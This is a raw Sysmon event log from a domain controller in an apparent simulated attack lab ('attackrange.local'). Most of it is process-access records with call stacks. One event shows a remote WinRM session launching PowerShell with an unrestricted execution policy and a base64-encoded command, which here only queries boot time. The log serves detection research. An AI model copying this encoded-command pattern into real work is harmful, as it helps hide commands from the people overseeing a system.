15:51:53.393{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002684Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C99-5FA1-7D00-000000008801}21242252C:\Windows\system32\conhost.exe{D28789B6-7C99-5FA1-7E00-000000008801}4172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002683Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002682Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002681Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002680Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002679Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002678Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002677Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002676Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002675Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002674Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C99-5FA1-7E00-000000008801}4172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002673Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C99-5FA1-7C00-000000008801}36324820C:\Windows\system32\WinrsHost.exe{D28789B6-7C99-5FA1-7E00-000000008801}4172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000002672Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.403{D28789B6-7C99-5FA1-7E00-000000008801}4172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C99-5FA1-8F0D-050000000000}0x50d8f0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C99-5FA1-7C00-000000008801}3632C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002671Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002670Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002669Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002668Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-1500-000000008801}13361488C:\Windows\system32\svchost.exe{D28789B6-7C99-5FA1-7C00-000000008801}3632C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002667Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.378{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C99-5FA1-7C00-000000008801}3632C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002666Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.378{D28789B6-7C99-5FA1-7D00-000000008801}21242252C:\Windows\system32\conhost.exe{D28789B6-7C99-5FA1-7C00-000000008801}3632C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002665Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C99-5FA1-7D00-000000008801}2124C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002664Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002663Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002662Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002661Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002660Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.362{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002659Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 